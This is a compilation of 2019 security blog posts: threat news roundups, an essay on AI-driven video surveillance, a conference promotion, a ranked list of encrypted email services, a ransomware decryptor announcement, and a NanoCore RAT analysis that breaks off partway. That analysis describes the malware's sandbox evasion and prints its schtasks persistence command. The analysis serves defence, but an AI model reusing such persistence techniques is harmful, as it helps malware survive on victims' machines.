While Cryptolocker malware has risen, the percentage of hidden mining has decreased to 7% from the previously reported 9% in Q4 2018.

“Hackers have started to upgrade miners, turning them into multifunctional Trojans. Once inside a system with low computational power on which mining is uneconomical, such Trojans start acting as spyware and steal data,” the report said. According to the research, cyber-criminals are using self-developed spyware or hacking government websites to steal data from governments.

Computers and Video Surveillance

It used to be that surveillance cameras were passive. Maybe they just recorded, and no one looked at the video unless they needed to. Maybe a bored guard watched a dozen different screens, scanning for something interesting. In either case, the video was only stored for a few days because storage was expensive.

Increasingly, none of that is true. Recent developments in video analytics -- fueled by artificial intelligence techniques like machine learning -- enable computers to watch and understand surveillance videos with human-like discernment. Identification technologies make it easier to automatically figure out who is in the videos. And finally, the cameras themselves have become cheaper, more ubiquitous, and much better; cameras mounted on drones can effectively watch an entire city. Computers can watch all the video without human issues like distraction, fatigue, training, or needing to be paid. The result is a level of surveillance that was impossible just a few years ago.

An ACLU report published Thursday called "the Dawn of Robot Surveillance" says AI-aided video surveillance "won't just record us, but will also make judgments about us based on their understanding of our actions, emotions, skin color, clothing, voice, and more. These automated 'video analytics' technologies threaten to fundamentally change the nature of surveillance."

Let's take the technologies one at a time. First: video analytics. Computers are getting better at recognizing what's going on in a video. Detecting when a person or vehicle enters a forbidden area is easy. Modern systems can alarm when someone is walking in the wrong direction -- going in through an exit-only corridor, for example. They can count people or cars. They can detect when luggage is left unattended, or when previously unattended luggage is picked up and removed. They can detect when someone is loitering in an area, is lying down, or is running. Increasingly, they can detect particular actions by people. Amazon's cashier-less stores rely on video analytics to figure out when someone picks an item off a shelf and doesn't put it back.

More than identifying actions, video analytics allow computers to understand what's going on in a video: They can flag people based on their clothing or behavior, identify people's emotions through body language and behavior, and find people who are acting "unusual" based on everyone else around them. Those same Amazon in-store cameras can analyze customer sentiment. Other systems can describe what's happening in a video scene.

Computers can also identify people. AIs are getting better at identifying people in those videos. Facial recognition technology is improving all the time, made easier by the enormous stockpile of tagged photographs we give to Facebook and other social media sites, and the photos governments collect in the process of issuing ID cards and drivers licenses. The technology already exists to automatically identify everyone a camera "sees" in real time. Even without video identification, we can be identified by the unique information continuously broadcasted by the smartphones we carry with us everywhere, or by our laptops or Bluetooth-connected devices. Police have been tracking phones for years, and this practice can now be combined with video analytics.

Once a monitoring system identifies people, their data can be combined with other data, either collected or purchased: from cell phone records, GPS surveillance history, purchasing data, and so on. Social media companies like Facebook have spent years learning about our personalities and beliefs by what we post, comment on, and "like." This is "data inference," and when combined with video it offers a powerful window into people's behaviors and motivations.

Camera resolution is also improving. Gigapixel cameras as so good that they can capture individual faces and identify license places in photos taken miles away. "Wide-area surveillance" cameras can be mounted on airplanes and drones, and can operate continuously. On the ground, cameras can be hidden in street lights and other regular objects. In space, satellite cameras have also dramatically improved.

Data storage has become incredibly cheap, and cloud storage makes it all so easy. Video data can easily be saved for years, allowing computers to conduct all of this surveillance backwards in time.

In democratic countries, such surveillance is marketed as crime prevention -- or counterterrorism. In countries like China, it is blatantly used to suppress political activity and for social control. In all instances, it's being implemented without a lot of public debate by law-enforcement agencies and by corporations in public spaces they control.

This is bad, because ubiquitous surveillance will drastically change our relationship to society. We've never lived in this sort of world, even those of us who have lived through previous totalitarian regimes. The effects will be felt in many different areas. False positives­ -- when the surveillance system gets it wrong­ -- will lead to harassment and worse. Discrimination will become automated. Those who fall outside norms will be marginalized. And most importantly, the inability to live anonymously will have an enormous chilling effect on speech and behavior, which in turn will hobble society's ability to experiment and change. A recent ACLU report discusses these harms in more depth. While it's possible that some of this surveillance is worth the trade-offs, we as society need to deliberately and intelligently make decisions about it.

Some jurisdictions are starting to notice. Last month, San Francisco became the first city to ban facial recognition technology by police and other government agencies. A similar ban is being considered in Somerville, MA, and Oakland, CA. These are exceptions, and limited to the more liberal areas of the country.

We often believe that technological change is inevitable, and that there's nothing we can do to stop it -- or even to steer it. That's simply not true. We're led to believe this because we don't often see it, understand it, or have a say in how or when it is deployed. The problem is that technologies of cameras, resolution, machine learning, and artificial intelligence are complex and specialized.

Laws like what was just passed in San Francisco won't stop the development of these technologies, but they're not intended to. They're intended as pauses, so our policy making can catch up with technology. As a general rule, the US government tends to ignore technologies as they're being developed and deployed, so as not to stifle innovation. But as the rate of technological change increases, so does the unanticipated effects on our lives. Just as we've been surprised by the threats to democracy caused by surveillance capitalism, AI-enabled video surveillance will have similar surprising effects. Maybe a pause in our headlong deployment of these technologies will allow us the time to discuss what kind of society we want to live in, and then enact rules to bring that kind of society about.

This essay previously appeared on Vice Motherboard.

Threat Roundup for June 7 to June 14

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between May 31 and June 7. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or


TRU06142019 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for June 7 to June 14 appeared first on Cisco Blog.

Top Security and Risk Management Trends Unveiled at Gartner Security and Risk Management Summit 2019

Standing at the shores of the Potomac, The Gaylord National Resort and Convention Center National Harbor is gearing up to host the 2019 Gartner Security and Risk Management Summit June 17-20. On in its 24th year, this event is the premier gathering of security, risk management and business continuity management leaders.

In the Digital Age, IT security is everyone’s business and Cisco is looking forward to continuing our tradition of being a Premier sponsor and sharing the latest innovations to improve your security posture and mitigate risk.

Whether you are a CISO looking to network with peers and improve your leadership skills or a security professional looking for practical advice – Cisco has a you covered.



Private Meetings

Want to talk strategy? Cisco executives and subject matter experts will be available for private meetings. Please get in  contact to schedule a meeting.

 Discount Code

Use priority code SECSP25 and receive $350 off your conference registration.

Cisco Booth 409

Will feature giveaways and demos including:


  • Endpoint Security
  • Advanced Malware Protection (AMP) and Cisco Threat Response
  • Secure Internet Gateway and SD-WAN
  • Cisco Umbrella, Cisco Cloudlock and Cisco Web Security Appliance (WSA)
  • Zero Trust
  • Duo Security, Now Part of Cisco
  • Network and Cloud Security Analytics
  • Stealthwatch
  • NGFW and NGIPS
  • Firepower and Cisco Defense Orchestrator
  • Workload Protection
  • Application and Workload Security


Networking Welcome Reception

Monday, June 17, 2019 | 5:45 p.m. – 7:30 p.m.

Location: Exhibit Showcase

Join us in the Exhibit Showcase for a special circus-themed reception where you can engage with your peers, Gartner Analysts, and exhibitors while enjoying delicious food and beverages, fun games, raffle drawings, and lively entertainment. Also, don’t miss a chance to get a sneak peak at the motorcycle we’ll be raffling off on Wednesday.

Hospitality Suite: Cisco Hog Wild

Wednesday, 5:45 p.m., National Harbor 5

All attendees are invited to cruise over for a night of blues, beer, BBQ, and a chance to win a 2019 Harley-Davidson Softtail Street Bob motorcycle!

Cisco Sessions

SPS13: The Tectonic Shift in Security

By: Gee Rittenhouse, Jeff Reed

Monday, June 17, 2019, 3:15–4 p.m. | Potomac C

Securing today’s modern work environment is increasingly complicated. As technology shifted to lean into the digital business transformation, a new architecture built for a multicloud environment was required. Cisco will discuss the multi-domain architecture needed to securely connect every user, on every device, on every network, to every application.


TH5: Threat Research – Fighting the Good Fight

By: Joel Esler

Monday, June 17, 2019, 1:15–1:40 p.m. | Theater 1, Exhibit Showcase, Prince George’s Hall D

Exploitable vulnerabilities exist. It’s a fact of life in the modern work environment. Attackers are achieving greater ROI with every attack. The counterpunch is threat intelligence. Cisco will discuss the future of threat, the evolving threat landscape and the inescapable need for automated threat intelligence as part of your security architecture.


ETSS3: Building Zero Trust Security Solutions

By: Wendy Nather, Ash Devata

Monday, June 17, 2019, 11:30 a.m.-12 p.m. | Chesapeake 3

Call it “zero trust” or “an initial step on the road to CARTA” – we know the classic design patterns of security have to change. In this session, we’ll talk about different ways to build on the fundamentals of “zero trust,” working together with partners in stages to create better and more usable security.


ETSS15: Future of the Firewall

By: Bret Hartman, Houda Soubra

Tuesday, June 18, 2019, 10:45–11:15 a.m. | Chesapeake 5

The digital transformation underway in many organizations poses an increasing challenge to security operations. Secure your hybrid environments of edge, end point and cloud with a single orchestrator solution to: Streamline policy design and enforcement; automate administrative tasks; improve accuracy; and reduce deployment time.


ETSS17: Designing Security for the Future of Your Network

By: Meg Diaz

Tuesday, June 18, 2019, 3:30–4 p.m. | Chesapeake 2

With the explosion of cloud apps, the move to highly distributed environments (SD-WAN, anyone?), and an increase in mobile workers, the threat landscape isn’t standing still. Learn more about what your peers are experiencing, a new approach to secure roaming users/branch locations, and how Cisco is evolving security to address these challenges in innovative ways.


ETSS23: Workload Security and Visibility

By: Vaishali Ghiya

Wednesday, June 19, 2019, 10:45–11:15 a.m. | Chesapeake 3

Technologies like virtualization, SDN are rapidly rolling out new applications and services. Modern applications no longer reside just within a company’s physical data center but also deploy across a multicloud environment. Learn how to 1) protect workloads 2) deliver a zero-trust security approach with deep visibility and multi-layered segmentation.

View the full agenda here. Don’t forget to download the conference app so that you don’t miss a beat!


Follow us and join the conversation on TwitterFacebookLinkedIn.

See you there!

The post Top Security and Risk Management Trends Unveiled at Gartner Security and Risk Management Summit 2019 appeared first on Cisco Blog.

Canadian City Fell Prey to a $375K Phish

Canadian City Fell Prey to a $375K Phish

Yet another city has fallen victim to a "a complex phishing email." The scam cost Burlington, Ontario, Canada, C$503,000 – the equivalent of nearly US$375,000.

“On Thursday, May 23, the City of Burlington discovered it was a victim of fraud. A single transaction was made to a falsified bank account as a result of a complex phishing email to City staff requesting to change banking information for an established City vendor. The transaction was in the form of an electronic transfer of funds made to the vendor...and was processed on May 16," the city announced.

Burlington immediately contacted law enforcement and a criminal investigation is underway, according to the announcement.  

“Cyber-attacks are on the rise, and phishing emails that involve the human factor are responsible for a great number of these breaches. Organizations globally are realizing the need to invest in employee training and deploy different training solutions in hope to mitigate the risk of data breaches,” said Shlomi Gian, CEO at CybeReady.

“Instead of increasing spending and IT effort, organizations should opt for smart solutions that guarantee change in employee behavior. Effective training should not become an IT and financial burden. Increased awareness might be the only way to reduce the risk of another incident like this in the foreseeable future.”

According to Global News Canada, none of Burlington’s systems have been impacted by the transaction. At this time, the city is not providing any additional information, but experts advise that all organizations continue to invest in their human capital via security training and awareness.

“Humans remain the weakest link in any organization. Properly implemented security controls can reduce the risk of human error but not eliminate it. Worse, cyber-criminals will now purposely target smaller organizations that cannot afford to invest in their cybersecurity,” said Ilia Kolochenko, founder and CEO of web security company ImmuniWeb.

Cyber News Rundown: Radiohead Hit by Ransomware Hack

Reading Time: ~ 2 min.

Radiohead Refuses Ransom, Releases Stolen Tracks

The band Radiohead recently fell victim to a hack in which 18 hours of previously unreleased sessions were ransomed for $150,000. Rather than pay the ludicrous fee, the band instead opted to release the tracks through Bandcamp for a donation to charity. The unreleased sessions were stored as archived mini discs the band created during the years surrounding their third album, “OK Computer.”

US Border Protection Breached by Contractor

A subcontractor for the US Customs and Border Protection (CBP) agency is under scrutiny after it was revealed that they had illicitly transferred thousands of images of both license plates and travelers that had crossed the US/Mexico border in the last month. In doing so, the subcontractor broke several mandatory security policies written into a legal contract. While there is no sign of the images leaking onto the dark web, there is very little redress for the exposed travelers without proving actual harm.

Billions of Spam Emails Sent Everyday

The latest industry report on spam emails revealed that around 3.4 billion fake/spam emails are distributed across the globe each day. More worrisome is that the majority of these emails originate in the US and regularly target US-based industries. While many industries have improved security measures, larger enterprises have struggled to implement strong protection for their entire staff.

Ransomware Hits Washington Food Bank

The Auburn Food Bank in the State of Washington recently fell victim to a ransomware attack that encrypted all but one of their computers, which was isolated from the internal network. Instead of paying the ransom, the nonprofit chose to wipe all computers, including their email server, and begin rebuilding from scratch. The ransomware variant has been claimed to be GlobeImposter 2.0, which requires the victim to contact the attacker to determine the ransom demanded.

Retro Game Site Breached

The account information was leaked for over 1 million users of EmuParadise, a retro gaming site that hosts all things gaming related. The breach, which took place in April of 2018, affected 1.1 million IP and email addresses, many of which were found in previous data breaches. It is still unclear how the breach actually took place, though given the use of salted MD5 hashes for storing user data it’s clear EmuParadise could have done more to properly secure their users information.

The post Cyber News Rundown: Radiohead Hit by Ransomware Hack appeared first on Webroot Blog.

The Best Encrypted Email Services You Need to Use in 2019

You may be concerned that everything you do online is being watched by the government, powerful corporations, or malicious hackers.  

How you can defend yourself against unwanted eyes is through encryption.

In the past, we’ve shared with you what encrypted messaging apps you should use for secure communication and also walked you through the most popular free encryption software tools.

We can all agree on the fact that a huge part of our internet activity revolves around email.  

Thus, in this article, I’m going to offer you some alternatives to popular email services such as Gmail or Yahoo, which can also be secured to a certain degree, but, at the same time, mainstream providers are notorious for mishandling their users’ data or scanning inboxes for keywords to display personalized ads.

I’m sure you want that everything you share via email to stay private and only be accessed by the people you choose, and the perfect way to do this is through encrypted emails.

Although there are multiple ways to secure your email using encryption software, they are often difficult to implement by unskilled users. Maybe at a later time, I’m going to also dig into this subject if you are interested, but for now, I’m going to look at some encrypted email services options that are easy to use.  

So, below I’ve put together a list of user-friendly web-based encrypted email services that will help you increase your level of online anonymity.  

You’ll notice that (almost) all of the options come from European countries. Here, the GDPR imposes strict rules on data privacy, and among many other regulations, it’s making privacy by design a legal requirement.  

Disclaimer: While none of those providers will share your data with other companies/advertisers, some may present it to government entities under legal demands.

1. ProtonMail

ProtonMail is an encrypted email service based in Switzerland and created by scientists, engineers, and developers from CERN, with the intention of increasing your online security and privacy. They pride themselves with datacenters “located under 1000 meters of granite rock in a heavily guarded bunker which can survive a nuclear attack”.  


  • Free option with 500MB storage and 150 emails per day
  • Paid options starting from $ 4.00 / Month for personal use
  • Business plans for $6.25 / Month / User
  • Two-step verification
  • Use your own domain
  • Mobile apps available (iOS and Android)
  • Report phishing option
  • Self-destructing messages – you can set an expiration time on your emails so they get automatically deleted from the recipient’s inbox after a certain time
  • Based on open source code
  • They use AES, RSA, and OpenPGP encryption

2. Tutanota  

Tutanota is an encrypted email provider from Germany. They position themselves as a secure alternative to Gmail. According to their website, they are also planning to include a calendar, notes, and cloud storage in their offering – and of course, all of these features will be encrypted too.  


  • Free for 1 user with 1GB of storage
  • Other paid options starting from €12 for personal use  
  • Business plans available
  • Free for non-profit organizations
  • Use your own domain
  • Two-factor authentication
  • Based on open-source code
  • Their data centers run on 100% renewable energy

Additional details:

If you want to send an email to someone who’s using a different email service (for instance, Gmail), you will be asked to enter a password that you will have to share with the recipient.  

The recipient will then use it to unlock your message and be able to read it by accessing a link. The URL will remain active until you sent them another confidential email.  

This is what an email sent from a Tutanota account to someone who is using a different email service looks like.  

3. Hushmail

Hushmail is a secure email service based in Canada that encrypts your email communication. Simplicity is at the core of their business in order to keep their customers secure and better understand potential threats. Hushmail uses the “passphrase” naming for the log-in field which is typically referred to as “password”, in this way encouraging people to use more complex passwords – phrases, rather than words.


  • 14-Day free trial (no credit card required), then $49.98 per year with 10GB of email storage
  • Business plans available
  • iOS app
  • Two-factor authentication
  • Use your own domain
  • An account will be locked if too many attempts are made to access it
  • Ability to set up Hushmail within an email program (Mac Mail, Microsoft Outlook, Android phone, Thunderbird)
  • Inbox antivirus and spam filtering
  • TLS/SSL, OpenPGP encryption

Additional details:

Similar to Tutanota, if your recipient is not using Hushmail, you have to check the Encrypted checkbox, and the email will be read on a secure web page.

4. Countermail

Countermail is a web-based encrypted email provider, with their data centers located in Sweden. Although their website looks quite outdated, their email security is able to handle today’s privacy threats.  


  • 7-Days free trial. After the trial ends, multiple plans are available starting with $4.83 per month with 4000MB of storage. You also have the possibility to add extra storage for a fee.
  • Compatible with Android phone
  • Message filter / Auto reply
  • Supports IMAP
  • Diskless web servers – This means they don’t have any hard drives and instead start from a CD-ROM for increased online privacy. Their web server does not log any IP-addresses.
  • USB-key option – It’s used as a keyfile in combination with your password for increased security. It provides better protection against keyloggers and brute force attacks.  
  • OpenPGP data encryption, SSL-MITM protection

5. Runbox

Headquartered in Norway, Runbox is a company that provides secure email services worldwide, offering encrypted communication and strong authentication.


  • Free 30-Day Trial
  • Paid plans for personal use, starting with EUR 14.95 per year, with 1 GB for email and 100 MB for files
  • Business plans starting with EUR 69.95 per year, with 25 GB for email, 2 GB for files, and 25 email domains
  • Accepted payment methods: Credit/debit cards, Bitcoin, PayPal, Money Orders, SWIFT/SEPA payments, and cash.
  • 60-day full money back guarantee
  • Use your own domain
  • Calendar
  • Ad-free Webmail, spam and virus filtering, email consolidation, and filtering
  • Access from any client via POP, IMAP, SMTP, and others
  • End-to-end encryption
  • Their servers run on 100% renewable energy

6. Kolab Now

Kolab Now offers email accounts for secure collaboration, with all the strongly protected data being stored in Switzerland. Just like any other secure encrypted email service, they will never monitor your data, sell it to third parties, or display ads.  


Image source:


  • 30-Day Free Trial, then prices start at $4.44 per month for an Individual account
  • Group accounts (1 to 100 users) from $5.42 per month
  • Calendar, address book, files, and more
  • Two-factor authentication (this will disable access to your account on any other channel, such as ActiveSync, *DAV and IMAP)
  • Mobile synchronization (enabled for mobile devices using ActiveSync)
  • Automatic replies

7. Mailfence

Mailfence was founded in Belgium on the principle that privacy is a right and not a feature. They focus on transparency and maintain an updated transparency report, also keeping their code open to audits.  

Image source:


  • Free version for 1 group with 500MB of email, 500MB of documents, 1.000 events calendars, support via email
  • Paid versions starting from EUR 2,50 per month and 5GB of email, 12 GB documents, 10.000 events calendar, support available via email and phone
  • Business plans available, tailored to your company’s needs
  • POPs, IMAPs, SMTPs, iOS, Android, Exchange
  • Custom email domain
  • Contacts, Calendar, Documents, and Groups
  • Accepted payment methods: credit card, PayPal, Bitcoin, Litecoin
  • Two-factor authentication
  • End-to-end encryption

8. Posteo

Posteo is an independent email service based in Germany focused on sustainability, security, privacy, and usability. The service is fully ad-free and they protect their users’ privacy through an innovative encryption and security model.

Image source:


  • Pricing starting with 1 EUR per month with 2GB storage – two aliases included. Storage can be increased up to max. 20 GB, each additional GB costs 0.25 EUR/month;
  • Migration service from other email accounts available (folder structure included)
  • Automatic replies
  • Anonymous signup – you don’t have to provide your name or address during registration
  • Anonymous payment – they don’t link payments with email accounts
  • Calendar  
  • 100% open-source code
  • Spam and virus filter
  • Emails sent don’t contain your IP address
  • Free support
  • Two-factor authentication
  • Accepted payments: PayPal, bank transfer, credit card or cash
  • TLS-encrypted access – TLS with PFS for IMAP, POP3, webmail, CardDAV, and CalDAV)
  • TLS-encrypted transmission: protects emails and metadata, as long as the other email server also supports it (TLS with PFS).
  • TLS-sending guarantee - protects you from sending emails to insecure systems
  • AES encrypted hard disks  
  • Runs on renewable energy 100%

9. StartMail

StartMail is based in The Netherlands and was built by the creators of StartPage, a private search engine. This is a great platform for secure communications, that can be accessed from a webmail interface, as well as through IMAP protocol, which makes it compatible with existing email clients.


  • Free 7-Day trial (no credit card required)
  • Accounts for personal use with $59.95 per year – 10 GB storage, 10 custom aliases, unlimited disposable aliases, IMAP support
  • Business accounts with $59.95 per mailbox per year – 10 GB storage, 10 GB storage, custom, and disposable aliases, IMAP support
  • Disposable email addresses – create temporary email addresses when you don’t want to share the real ones
  • IMAP/SMTP compatible
  • It’s based on a mix of open-source and closed-source components
  • PGP encryption, security like PFS (TLS 1.1 & 1.2), and extra-secure vaults

10. Mailbox

Mailbox is a secure email provider based in Germany, which was founded with the purpose of becoming an alternative to other webmail services that depend on their customer data to obtain revenue from advertising. All created accounts include other features besides an email inbox, such as a cloud office suite to edit documents, a calendar, etc.


  • Free 30-Day Trial, with 10 emails per day, storage space of 100MB for emails, 10MB file storage, 1 email address alias
  • Paid option for personal use starting with 1 EUR per month, with 2GB email storage, 3 email aliases
  • Business email plan starting with 25 EUR per month, with central management console, email and groupware, cloud storage, online word processing, and more
  • Calendar, Contacts, Task Planner
  • Online Office
  • Cloud Storage
  • Offline mode  
  • Advanced users are offered dedicated Tor Exit Node with Hidden Onion Services available at their data center
  • Their servers run on 100% green energy

How you can increase your online security and privacy even more

Hopefully, I’ve helped you choose an encrypted email service alternative to the risky email provider you are currently using. Yet, obviously, email anonymity does not equal online security.  

Even though some of the email services listed above also include spam filtering, virus scanning, or report phishing options, malicious attackers can always find ways to send you malware-infected links via email.  

This is why you should also be using a proactive, threat prevention solution for your PC, which lets you click any link with confidence and allows you to be sure that you won’t get touched by malware.  

And it scans and blocks the URLs you click both in your inbox and anywhere else on the web.   

The easy way to protect yourself against malware
Here's 1 month of Thor Foresight Home, on the house!
Use it to: Block malicious websites and servers from infecting your PC Auto-update your software and close security gaps Keep your financial and other confidential details safe


Try Thor Foresight

Here’s some great news for companies  

We’re working hard on a brand new email module specifically designed to prevent business email compromise (BEC) attacks. We will keep you posted on the progress, so stay tuned!

Are you using any secure email service? Do you have any suggestions that we could add to the list? Let us know in the comments section below!


The post The Best Encrypted Email Services You Need to Use in 2019 appeared first on Heimdal Security Blog.

This Week in Security News: Spam Campaigns and Cryptocurrency Miners

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about advanced targeted attack tools being used to distribute cryptocurrency miners as well as a spam campaign targeting European users.

Read on:

Advanced Targeted Attack Tools Found Being Used to Distribute Cryptocurrency Miners
Regular cybercriminals appear to be taking a page from targeted attack actors’ playbooks — or rather, toolkits — to maximize their profits from illicit activities like cryptojacking.

Congress to Take Another Stab at ‘Hack Back’ Legislation
Rep. Tom Graves, R-Ga., is reintroducing a bill that would allow companies to go outside of their own networks to identify their attackers and possibly disrupt their activities.

Spam Campaign Targets European Users with Microsoft Office Vulnerability (CVE-2017-11882)
An active Microsoft Office and WordPad spam campaign is targeting European users, using languages such as Romanian and files that allow attackers to exploit the CVE-2017-11882 vulnerability.

License Plates, Photos, Passwords and More Stolen in Two Separate Breaches
Two major breaches, one at US Customs and Border Protection and another with a retro gaming site Emuparadise, highlight the need for effective data protection.

Major HSM Vulnerabilities Impact Banks, Cloud Providers, Governments
Two security researchers have recently revealed vulnerabilities that can be exploited remotely to retrieve sensitive data stored inside special computer components known as HSMs (Hardware Security Modules).

Data Breach Disclosed by Online Invitation Firm Evite
Online invitation and stationary company Evite notified customers of a data breach that stemmed from an inactive data storage file associated with user accounts.

June’s Patch Tuesday Fixes 88 Security Flaws, Including SandboxEscaper’s Zero Days, HoloLens
Microsoft’s June Patch Tuesday announced the release of 88 vulnerability patches in this month’s security bulletin, as well as four advisories and one servicing stack update.

Have I Been Pwned Is Looking for a New Owner
Owner Troy Hunt revealed he’s looking for an acquirer for the breach notification service he set up called “Have I Been Pwned”. Traffic to the site has exploded since January when he uploaded a 773 million record list of breached emails and passwords that could be used for automated unauthorized logins.

Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns
In their latest campaign, cybercriminal group TA505 used HTML attachments to deliver malicious .XLS files that lead to downloader and backdoor FlawedAmmyy, mostly to target users in South Korea.

MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools
Analysis of new campaigns wearing the badge of MuddyWater revealed the use of new tools and payloads, which indicates that the well-known threat actor group is continuously developing their schemes.

U.S. Ramping Up Offensive Cyber Measures to Stop Economic Attacks, Bolton Says
The U.S. is beginning to use offensive cyber measures in response to commercial espionage, according to John Bolton, President Trump’s national security adviser.

CVE-2019-2725 Exploited and Certificate Files Used for Obfuscation to Deliver Monero Miner
Feedback from the Trend Micro Smart Protection Network security architecture revealed a cryptocurrency-mining activity involving the CVE-2019-2725 vulnerability, but with an interesting twist — the malware hides its malicious codes in certificate files as an obfuscation tactic.

Do you worry about being targeted by spam campaigns via work tools like Microsoft Office? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.



The post This Week in Security News: Spam Campaigns and Cryptocurrency Miners appeared first on .

Episode 515 – Security In Five Patreon Site Is Live

After two years Security In Five is ready to expand and grow into new expanding content and media to help spread the security awareness word. A patreonsite has been launched to help support this expansion. This episode talks about why it was created and goes through the different levels. Security In Five Patreon. Be aware, […]

The post Episode 515 – Security In Five Patreon Site Is Live appeared first on Security In Five.

French authorities released the PyLocky decryptor for versions 1 and 2

Good news for the victims of the pyLocky Ransomware versions 1 and 2, French authorities have released the pyLocky decryptor to decrypt the files for free.

French authorities have released a decryptor for pyLocky Ransomware versions 1 and 2. The decryptor allows victims to decrypt their files for free. It was developed in collaboration between French law enforcement, the French Homeland Security Information Technology, and Systems Service, along with independent and volunteer researchers.

“PyLocky is very active in France, both within the professional environment (SMEs, large businesses, associations, etc.) as well as at home. This tool is a result of a collaborative Among the agencies of the french Ministry of Interior, Including the first Brigade of fraud investigations in information technology  (BEFTI) of the Regional Directorate of the Judicial Police of Paris , on the of technical elements gathered during its investigations and collaboration with volunteer researchers.” reads the post published by the French Ministry of Interior states it is more active in Europe.

“Those elements allowed the Homeland Security Information Technology and Systems Service ST (SI) ², part of the National Gendarmerie , to create that software.”

French Ministry of Interior pointed out that the ransomware hit many people in Europe, especially SMBs, large businesses, associations.

The pyLocky decryptor allows to decrypt file for version 1 (filenames having the .lockedfile or .lockymap extensions) and version 2 ( extensions .locky).

pyLocky Decryptor

The pyLocky Decryptor could be downloaded from the following link:

The decryptor has as pre-requisite the installation of the Java Runtime.

“This software decrypts the encryption of files with the extension .lockedfile or .lockymap and version 2 (encrypted files with the .locky extension) of PyLocky.” continues the report. “It requires a computer running the operating system Microsoft Windows 7 or higher and the execution environment Java JRE (Java Runtime Environment) version 8.”

The malware researcher Michael Gillespie analyzed the decryptor and noticed the presence of 2 hardcoded private RSA keys that were likely obtained by French police from the access to the C2 server hosted on the Tor network.

Let me remind you that the decryptor doesn’t clean the infected systems.

Pierluigi Paganini

(SecurityAffairs – pyLocky Decryptor, malware)

The post French authorities released the PyLocky decryptor for versions 1 and 2 appeared first on Security Affairs.

Dissecting NanoCore Crimeware Attack Chain

The Cybaze-Yoroi ZLab analyzed a new sample of Nanocore Remote Administrator Tools (RAT) using a Delphi wrapper to protect its code.


Historically, cyber-criminals adopted one or more layers of encryption and obfuscation to lower their footprint and avoid detection. The usage of cryptors and packers has become a commodity in the contemporary malware landscape, providing the so-called “FUD” (Fully UnDetectable) capabilities to malicious code and allowing the outsourcing of the payload hiding.

The CSDC monitoring operations spotted a particular sample of the famous Nanocore Remote Administrator Tools (RAT). In this specific case, a Delphi wrapper was used to protect the RAT. Thus, Cybaze-Yoroi ZLab decided to analyze this threat.

Technical Analysis

Nanocore RAT is a “general purpose” malware with specific client factories available to everyone and easily accessible. During our cyber-defense activities we discovered attack attempts against Italian companies operating in the Luxury sector. For instance, we intercepted malicious email claiming to come from a well known Italian Bank and then we started to analyze it.

Figure 1: Part of initial e-mail

The attachment looks like a 7z archive file containing a valid PE file with Adobe Acrobat icon. Trivial trick used to lure ingenuous users to believe that it is a legit PDF file. However, it contains a PE executable:

ThreatNanocore RAT wrapper
Brief DescriptionDelphi Language Wrapper for Nanocore RAT

Table 1: Static info about Nanocore dropper/NanoCore RAT

Then we extracted some static information on the sample:

Figure 2: Information about “trasferimento.exe” dropper/NanoCore RAT

The sample was compiled with “BobSoft Mini Delphi” compiler and two characteristics are significant: the first one is the high level of entropy, this leads us to think that the sample was somehow packed; the second one is the absolutely fake compilation timestamp of the executable.

Executing the malware, we notice the presence of some checks performed by the malware in order to evade analysis boxes.

Figure 3: Processes checked by malware

In the above figure, are shown some processes checked by the malware. This action is performed through the usage of the classical Win32 API calls “CreateToolhelp32Snapshot” and “Process32Next”.

Figure 4: API calls to check open tools

If no one of the checked processes is active, the malware can proceed with the real infection: it writes the real payload of Nanocore RAT in the “%TEMP%” folder.

Figure 5: NanoCore payload written by the loader and relative API calls

The interesting thing is the payload, that is further loaded into memory, is merely embedded inside a resource without any encryption or obfuscation.

Figure 6: Comparison between payload embedded in resource of “trasferimento.exe” sample and “non.exe” written in %TEMP% folder

As shown in the above figure, the “trasferimento.exe” Delphi wrapper has got a lot of embedded resources (as visible on the left), and one of them contains the entire Nanocore RAT payload. On the right, there is a diff analysis of the resource named “2035” and the actual payload triggered on the victim machine. The resource “2035” has a sort of header (highlighted in yellow, on the left upper corner), which contains the name of the payload to implant on the machine “non.exe”. The succeeding piece of code is identical, without any protection. The “trasferimento.exe” component runs a scheduled task in order to guarantee its persistence.

Figure 7: Task-scheduler set by malware

At this point the malware creates a xml file with a pseudo-random name containing the configuration for its persistence on the machine. After creating this file, the malware spawns the “non.exe” process and then re-spawn itself through the following command lines.

schtasks.exe” /create /f /tn “IMAP Subsystem” /xml “C:\Users\admin\AppData\Local\Temp\tmpC5A7.tmp”schtasks.exe” /create /f /tn “IMAP Subsystem” /xml “C:\Users\admin\AppData\Local\Temp\tmpCB59.tmp”

The body of the xml configuration file is the following:

